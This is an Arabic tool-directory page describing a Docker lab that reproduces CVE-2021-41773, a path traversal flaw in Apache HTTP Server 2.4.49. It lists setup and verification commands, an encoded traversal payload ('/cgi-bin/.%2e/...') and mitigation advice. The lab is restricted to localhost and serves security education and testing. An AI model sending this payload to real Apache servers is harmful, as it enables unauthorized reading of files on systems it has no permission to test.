Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773-Apache-Lab — مختبر قائم على Docker لإعادة إنتاج CVE-2021-41773 (خادم Apache HTTP Server 2.4.49) عبر تجاوز مسار محكوم وكشف الملفات باستخدام PoC مخصص بلغة Python. | Kitploit
أدوات/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

مختبر قائم على Docker لإعادة إنتاج CVE-2021-41773 (خادم Apache HTTP Server 2.4.49) عبر تجاوز مسار محكوم وكشف الملفات باستخدام PoC مخصص بلغة Python.

عرض المستودع
1منذ 27 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2021-41773 — Apache HTTP Server 2.4.49

إعادة إنتاج CVE-2021-41773، وهي ثغرة اجتياز المسار في Apache HTTP Server 2.4.49.

يستخدم هذا المشروع Docker لإنشاء بيئة ضعيفة ومعزولة، بالإضافة إلى PoC مكتوبة بلغة Python لإثبات كشف ملفات مُتحكَّم فيه.

السلامة: تقبل الـ PoC الأهداف localhost و127.0.0.1 و::1 فقط. يجب أن يبقى الاختبار داخل المختبر المعزول.

الهدف

يوضح هذا المشروع:

  • إعداد Apache HTTP Server 2.4.49 في Docker
  • التحقق من إصدار Apache الضعيف
  • إعادة إنتاج CVE-2021-41773
  • إثبات كشف ملفات مُتحكَّم فيه
  • تطوير PoC مخصص بلغة Python
  • جمع أدلة الاستغلال
  • توثيق خطوات التخفيف

يركز العرض على كشف الملفات بدلاً من تنفيذ التعليمات البرمجية عن بُعد.

بنية المشروع

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

المتطلبات

  • Docker
  • Python 3.x
  • Git

تستخدم الـ PoC مكتبة Python القياسية فقط ولا تتطلب حزم Python تابعة لجهات خارجية.

إعداد المختبر

1. بناء صورة Docker

من المجلد الجذر للمستودع:

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. تشغيل خادم Apache الضعيف

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

أبقِ هذه الطرفية تعمل.

يتم كشف خدمة Apache فقط عبر:

root@kitploit:~
127.0.0.1:8080

التحقق

التحقق من الحاوية

في طرفية أخرى:

root@kitploit:~
docker ps

يجب أن تظهر الحاوية:

root@kitploit:~
127.0.0.1:8080->80/tcp

التحقق من إصدار Apache

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

النتيجة المتوقعة:

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

التحقق من الوصول العادي عبر HTTP

root@kitploit:~
curl http://127.0.0.1:8080/

يجب أن يتم إرجاع صفحة اختبار Apache.

الاستغلال

توجد الـ PoC في:

root@kitploit:~
exploit/exploit.py

شغّل:

root@kitploit:~
python3 exploit/exploit.py

الهدف الافتراضي هو:

root@kitploit:~
http://127.0.0.1:8080

ملف الإثبات الافتراضي هو:

root@kitploit:~
/lab/secret.txt

يعرض التشغيل الناجح ما يلي:

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

ثم تعرض الـ PoC محتويات ملف المختبر المُتحكَّم فيه.

كيف تعمل الـ PoC

تتحقق الـ PoC أولاً من أن الهدف عنوان محلي:

root@kitploit:~
localhost
127.0.0.1
::1

ثم تُنشئ مساراً يحتوي على مكونات اجتياز مُرمَّزة:

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

يتم إرسال الطلب باستخدام وحدة socket القياسية في Python. وهذا يمنح الـ PoC تحكماً مباشراً في مسار طلب HTTP.

يعالج خادم Apache 2.4.49 الضعيف المسار المُعدّ ويعيد محتويات:

root@kitploit:~
/lab/secret.txt

استرجاع هذا الملف يؤكد اجتياز المسار وكشف الملفات المُتحكَّم فيه.

ملخص الثغرة

CVE: CVE-2021-41773

المنتج: Apache HTTP Server

الإصدار المتأثر المُوضَّح: 2.4.49

نوع الثغرة: اجتياز المسار / كشف الملفات

CVE-2021-41773 هي ثغرة اجتياز مسار في Apache HTTP Server 2.4.49. يمكن لعنوان URL مُصنَّع بعناية تجاوز قيود المسار المقصودة والسماح بالوصول إلى ملفات خارج الدليل المتوقع.

في ظل تكوينات معينة، يمكن أن تكون للثغرة عواقب أكثر خطورة. يعرض هذا المشروع عمداً كشف ملفات مُتحكَّم فيه في بيئة Docker معزولة.

الأدلة

يتم تخزين لقطات الشاشة التي تم جمعها أثناء الاختبار في:

root@kitploit:~
evidence/

تشمل الأدلة:

  1. الحاوية العاملة في Docker
  2. التحقق من إصدار Apache HTTP Server 2.4.49
  3. تنفيذ ناجح لـ PoC بلغة Python

التخفيف

التخفيف الأساسي هو ترقية Apache HTTP Server إلى إصدار مُصحَّح.

تشمل الإجراءات الدفاعية الإضافية:

  • حافظ على تحديث Apache بالتصحيحات بانتظام.
  • قيّد الوصول إلى الملفات الحساسة.
  • راجع تكوينات Alias وCGI.
  • طبّق صلاحيات الحد الأدنى من الامتيازات.
  • تجنّب كشف الخدمات غير الضرورية.
  • راقب سجلات الخادم بحثاً عن طلبات اجتياز مسار مشبوهة.

المراجع

  • النشرة الأمنية لخادم Apache HTTP: https://httpd.apache.org/security/vulnerabilities_24.html

  • قاعدة بيانات الثغرات الوطنية NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • النشرة الأمنية CERT-EU: https://cert.europa.eu/publications/security-advisories/2021-054/

إخلاء المسؤولية

هذا المشروع مخصص حصرياً للتعليم الأمني المصرح به والاختبارات المختبرية المُتحكَّم فيها.

تم تصميم بيئة Docker والـ PoC للاختبار المحلي. لا تستخدم الـ PoC ضد أنظمة لا تملكها أو ليس لديك إذن صريح بتقييمها.

تنزيل الأداة